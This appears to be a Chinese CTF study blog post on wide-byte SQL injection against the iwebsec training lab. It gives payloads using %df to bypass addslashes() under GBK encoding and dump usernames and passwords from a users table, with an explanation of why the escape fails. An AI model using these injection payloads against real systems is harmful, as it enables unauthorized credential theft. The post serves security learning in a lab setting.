CTF学习笔记4:iwebsec-SQL注入漏洞-02-字符型注入

已于 2022-01-22 23:25:08 修改
阅读量816 收藏 2
点赞数
分类专栏: CTF 文章标签: sql web安全 安全
于 2022-01-22 17:43:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lifeng_dc/article/details/122640178
版权

目录

一、直接上payload

方法:宽字节注入

?id=-1%df' union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+


?id=-1%df%5c%27 union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+

在这里插入图片描述

二、源码分析

(一)查看源文件

在这里插入图片描述
addslashes()是PHP函数,用于在 ’ " \ 前加上转义符
SET NAMES gbk用于设置字符集

(二)在源文件中加入输出语句

为了查看不同的输入产生SQL语句,修改源文件如下
在这里插入图片描述

(三)测试payload过程

1.简单单引号闭合,不能得到结果

在这里插入图片描述

2.在单引号前加%df,使转义符逃逸,得到结果

%df可以想象成半个汉字,一个汉字需要2个字节,既然是半个,它就会往后找到 \ 并与之结合
在这里插入图片描述

lvx++
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB-web-SQL注入
ookami6497的博客
11-29 759
CTFHUB SQL
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4844
以pikachu靶场练习来学习ctf知识
CTFHub:web前置技能-SQL注入-字符注入
wdnmddbl的博客
06-12 1074
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:字符注入点网页链接有类似的结构。
学习笔记四:sql手工注入
mcc的博客
06-05 1175
sql-labs靶机通关 原文链接:http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/#less-29 1.Less-1 暴库 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; #检查是否存在漏洞 http://127.0.0.1/4/L...
网络安全:SQL 注入漏洞_cve-2021-1636
2401_84215240的博客
05-23 962
一、漏洞描述 WordPress是一个用PHP编写的免费开源内容管理系统,由于clean_query函数的校验不当,导致了可能通过插件或主题以某种方式从而触发SQL注入的情况。这已经在WordPress5.8.3中进行了修复。影响版本可以追溯到3.7.37。 二、漏洞分析 在分析整个漏洞之前,首先可以看一下如果想要触发该漏洞漏洞代码应该是什么样子的。 new WP_Query($_POST['query_vars']) 这也就是说,传入WP_Query的参数如果可控的话,就可以利用该漏洞。接下来我们看看整
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 653
重新来做一遍 争取不看wp。
SQL注入之联合查询——ctf公开课笔记记录
m0_75196987的博客
04-18 470
SQL注入之联合查询——来自 长空实验室ctf新兵训练营。Sqli-labs靶场搭建以及做题wp将由我亲自实践并为大家呈现。
从0到1 CTFer成功之路》SQL注入---学习笔记
aweiname2008的博客
06-13 474
《从0到1 CTFer成功之路》学习笔记 书中已经有很详细的代码讲解,但是部分测试代码需要自己来敲,还要搭建php+mysql环境,如果这些有docker不就更好了,我自己是在虚拟机中搭建中,记录一下学习过程,希望能帮助到有需要的人。学习笔记按书的章节记录,并非全部零星记录。 第1章 web入门 1.2 CTF中的SQL注入 1.21 SQL基础 测试使用的php代码: <?php //连接本地MySQL,数据库为test $conn = mysqli_connect("127.0.0.1","
CTFHub | 字符注入
尼泊罗河伯的博客
10-27 1503
此题目和上一题相似,一个是整数注入,一个是字符注入字符注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
java网站源码CTF-武士刀 约翰哈蒙德 | 2018 年 2 月 1 日 在撰写本文时,此存储库将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”页面 () ...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 826
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
Sqli-labs-master的21—25通关教程
最新发布
weixin_68416970的博客
07-25 820
Sqli-labs-master靶场的21、22、23、24、25关教程
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 412
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 278
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLi-LABS基础挑战解析:1-22关攻略
"SQLi-LABS 是一个用于学习和实践 SQL 注入漏洞的平台,提供了基础到高级的挑战。本文档涵盖了第一部分的基础挑战,从 Less-1 到 Less-22,适合网络安全初学者和 CTF 玩家。通过这些关卡,你可以了解和掌握 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值